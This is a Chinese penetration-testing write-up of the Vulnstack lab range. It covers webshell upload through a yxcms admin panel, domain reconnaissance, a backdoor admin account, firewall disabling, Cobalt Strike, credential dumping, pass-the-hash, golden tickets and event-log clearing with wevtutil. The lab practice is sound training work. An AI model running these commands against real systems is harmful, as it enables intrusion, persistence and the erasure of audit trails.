新密码设置:hongrisec@2024
网络适配器的设置
根据vulnstack给的网络拓扑图,修改虚拟机的网络配适器
改好之后,要去“网络连接”里面看一下,要保持一致,不一样的话就刷新
Win2003、Win2008 网络适配器设置成自定义(VMnet1仅主机模式)即可
Web服务器:
Windows7(内配有phpstudy web环境)
模拟ip:192.168.211.130
内网ip:192.168.52.143
域内主机:
Win2K3 Metasploitable
内网ip:192.168.52.141
域控:
Windows 2008
内网ip:192.168.52.138
以上内网无法与通信,只有win7可以连通内。
初探
win7里面的phpstudy
先初探一下
这里可以直接看到yxcms和phpmyadmin的东西
登进后台
发现从这里进入可以直接编辑php的东西,那么应该也能webshell吧……
写入webshell并连接
直接新建tet.php写入一句话
┌──(root💀kali)-[~]
└─# dirsearch -u http://192.168.211.130/yxcms
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/reports/http_192.168.211.130/_yxcms_24-08-15_10-06-51.txt
Target: http://192.168.211.130/
[10:06:51] Starting: yxcms/
[10:06:53] 403 - 217B - /yxcms/%3f/
[10:06:53] 403 - 221B - /yxcms/%C0%AE%C0%AE%C0%AF
[10:06:53] 404 - 209B - /yxcms/%2e%2e//google.com
[10:06:53] 403 - 216B - /yxcms/%ff
[10:06:54] 403 - 226B - /yxcms/.ht_wsr.txt
[10:06:54] 403 - 229B - /yxcms/.htaccess.bak1
[10:06:54] 403 - 229B - /yxcms/.htaccess.orig
[10:06:54] 403 - 229B - /yxcms/.htaccess.save
[10:06:54] 403 - 229B - /yxcms/.htaccess_orig
[10:06:54] 403 - 227B - /yxcms/.htaccessOLD
[10:06:54] 403 - 227B - /yxcms/.htaccessBAK
[10:06:54] 403 - 228B - /yxcms/.htaccessOLD2
[10:06:54] 403 - 231B - /yxcms/.htaccess.sample
[10:06:54] 403 - 220B - /yxcms/.html
[10:06:54] 403 - 219B - /yxcms/.htm
[10:06:54] 403 - 230B - /yxcms/.htaccess_extra
[10:06:54] 403 - 227B - /yxcms/.htaccess_sc
[10:06:54] 403 - 229B - /yxcms/.htpasswd_test
[10:06:54] 403 - 226B - /yxcms/.httr-oauth
[10:06:54] 403 - 225B - /yxcms/.htpasswds
[10:06:56] 404 - 242B - /yxcms/\..\..\..\..\..\..\..\..\..\etc\passwd
[10:06:56] 404 - 211B - /yxcms/a%5c.aspx
[10:07:03] 301 - 242B - /yxcms/data -> http://192.168.211.130/yxcms/data/
[10:07:03] 200 - 314B - /yxcms/data/
[10:07:06] 200 - 214B - /yxcms/httpd.ini
[10:07:06] 403 - 231B - /yxcms/index.php::$DATA
[10:07:07] 200 - 24KB - /yxcms/index.pHp
[10:07:07] 200 - 24KB - /yxcms/index.php.
[10:07:12] 301 - 244B - /yxcms/public -> http://192.168.211.130/yxcms/public/
[10:07:12] 200 - 772B - /yxcms/Public/
[10:07:12] 200 - 772B - /yxcms/public/
[10:07:12] 200 - 83B - /yxcms/robots.txt
[10:07:16] 403 - 231B - /yxcms/Trace.axd::$DATA
[10:07:16] 301 - 244B - /yxcms/Upload -> http://192.168.211.130/yxcms/Upload/
[10:07:16] 301 - 244B - /yxcms/upload -> http://192.168.211.130/yxcms/upload/
[10:07:16] 200 - 514B - /yxcms/upload/
[10:07:18] 403 - 232B - /yxcms/web.config::$DATA
Task Completed
然后一步一步推断,拿到要的acomment.php路径
随便用一个shell连接器连接即可
内网探测
直接去终端看,发现是管理员
信息收集
ipconfig /all #查看本机ip,所在域
route print #打印路由信息
net view #查看局域网内其他主机名
arp -a #查看arp缓存
net start #查看开启了哪些服务
net share #查看开启了哪些共享
net share ipc$ #开启ipc共享
net share c$ #开启c盘共享
net use 1\192.168.xx.xx\ipc$ "" /user:"" #与192.168.xx.xx建立空连接
net use \\192.168.xx\c$ "密码" /user:"用户名" #建立c盘共享
dir l\192.168.xx.xx\c$\user #查看192.168.xx.xc盘user目录下的文件
net config workstation #查看计算机名,全名,用户名,系统版本,工作站,域,登录域
net user #查看本机用户列表
net user /domain #查看域用户
net localgroup administrators #查看本地管理员组(通常会有域用户)
net view /domain #查看有几个域
net user 用户名 /domain #获取指定域用户的信息
net group p /domain #查看域里面的工作组,查看把用户分了多少组(只能在域控上操作)
net group 组名 /domain #查看域中某工作组
net group "domain admins" /domain #查看域管理员的名字
net group "domain computers" /domain #查看域中的其他主机名
net group oup "doamin controllers" /domain #查看域控制器(可能有多台)
该域名为god.org,域管理员为Administrator,域控为OWA$
路由信息
内网网段为192.168.52.1/24
用Ping命令探测域控的ip
ping owa.god.org
可知域控ip为192.168.52.138
创建一个rayna用户,并加入管理组
net user rayna Fray@123 /add net localgroup administrators rayna /add
cs启动
蚁剑与cs联动
生成”有效载荷类的exe“ 的木马并上传和运行
上线之后关闭防火墙shell netsh advfirewall set allprofiles state off
提权
一般插件基本上都可以做到
抓取明文密码
内网横向
需要新建一个SMB这里命名”SMB“,对端连接的隧道选择system权限的
横向成功
权限维持(黄金票据)
抓取hash
几个用户的hash值明显都一样 直接pth攻击就行了
痕迹清除
shell wevtutil cl security //清理安全日志
shell wevtutil cl system //清理系统日志
shell wevtutil cl application //清理应用程序日志
shell wevtutil cl "windows powershell" //清除power shell日志
shell wevtutil cl Setup //清除(cl)事件日志中的 "Setup" 事件。
